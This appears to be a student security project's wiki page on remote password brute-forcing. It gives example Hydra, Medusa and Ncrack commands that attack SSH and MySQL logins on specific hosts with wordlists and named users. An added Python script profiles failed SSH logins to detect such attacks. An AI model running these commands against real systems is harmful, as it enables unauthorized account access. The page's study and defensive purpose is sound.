Password Cracking
Password cracking is one of the most basic types of attacks. Password cracking is (very broadly) divided into two categories. The first is hash cracking, where a hashed version of a password is obtained through network monitoring, retrieving an encrypted password file, etc., and a tool is then used to break the hash. Common tools for this depend on the situation, but include: Aircrack, for WEP/WPA passwords; John the Ripper, for Unix passwords; and Cain and Abel, for Windows passwords. The second, and the type this project is concerned with, is brute-force remote authentication attacks.
TOOLS USED
THC-Hydra
Example Attack
# Attempting to crack John Doe (jdoe) on ssh with Roget's wordlist
hydra -ljdoe -P passwd_lists/Roget.words 137.22.73.129 ssh

# Try cracking on all the .73 hosts we have running, checking extra stuff
# for passwords, showing all combos, and writing success to file
hydra -L carletonusers.txt -P passwd_lists/Unabr.dict -M hosts.txt -e ns -v -o valid_credentials.txt
Medusa
Example Attack
# Attempting to crack jdoe on ssh with Roget's wordlist
medusa -ujdoe -P passwd_lists/Roget.words -h137.22.73.131 -Mssh

# Attempting to crack me on mysql with englex-dict, using ssl
medusa -ugriffisd -P passwd_lists/englex-dict -h137.22.73.131 -s -Mmysql
Ncrack
Example Attack
# Run on SSH with input username and password list, prioritizing to
# username:allpasswords, not allusernames:password
ncrack -U carletonusers.txt -P passwd_lists/Unabr.dict --passwords-first 137.22.73.130 -p22

# Run, very carefully, using built-in lists on SSH
ncrack -T paranoid 137.22.73.132 -p22

# Hammer the ever-loving shit out of one pre-determined user
ncrack --user christjo -T insane 137.22.73.132 -p22
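The Ncrack comments above contrast two guess orderings and two timing templates. As an added example (not part of the original wiki page or of any of these tools), this Python code profiles failed SSH logins per source address so that both a fast single-account run and a slow multi-account run show up on the defending host. The log lines, IPs, usernames, `ASSUMED_YEAR` and the `profile_sources` name are constructed for illustration and assume the stock OpenSSH "Failed password" syslog format.

```python
import re
from collections import defaultdict
from datetime import datetime

ASSUMED_YEAR = 2024  # assumption: syslog timestamps carry no year
FAILED = re.compile(
    r"^(\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+")

def _line(clock, user, ip):
    return (f"Mar  3 {clock} host sshd[101]: Failed password for "
            f"{user} from {ip} port 40000 ssh2")

# Constructed sample (documentation IPs, made-up users), not real log data.
SAMPLE_LOG = "\n".join(
    # Fast run against a single account.
    [_line(f"10:00:0{i}", "alice", "198.51.100.7") for i in range(6)]
    # Slow run cycling through accounts, ten minutes between attempts.
    + [_line(f"11:{i}0:00", ("alice", "bob", "carol")[i % 3], "203.0.113.9")
       for i in range(6)]
    + [_line("12:00:00", "bob", "192.0.2.50")])  # one mistyped password

def profile_sources(log_text, min_failures=4):
    """Summarise failed SSH logins per source IP over the whole log."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(f"{ASSUMED_YEAR} {m[1]}", "%Y %b %d %H:%M:%S")
            events[m[3]].append((ts, m[2]))
    report = {}
    for ip, evs in events.items():
        if len(evs) < min_failures:  # ignore the occasional typo
            continue
        evs.sort()
        users = [u for _, u in evs]
        # Count how often consecutive attempts change account name.
        switches = sum(a != b for a, b in zip(users, users[1:]))
        span = (evs[-1][0] - evs[0][0]).total_seconds()
        report[ip] = {
            "failures": len(evs),
            "users": len(set(users)),
            "ordering": "per-user" if switches < len(users) / 2 else "per-password",
            "per_minute": round(len(evs) / max(span, 1) * 60, 2),
        }
    return report

if __name__ == "__main__":
    print(profile_sources(SAMPLE_LOG))
```

Because failures are counted over the whole log rather than a short window, the slow source is still reported even though its rate is far below any per-minute threshold.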
ATTACK PROFILE
????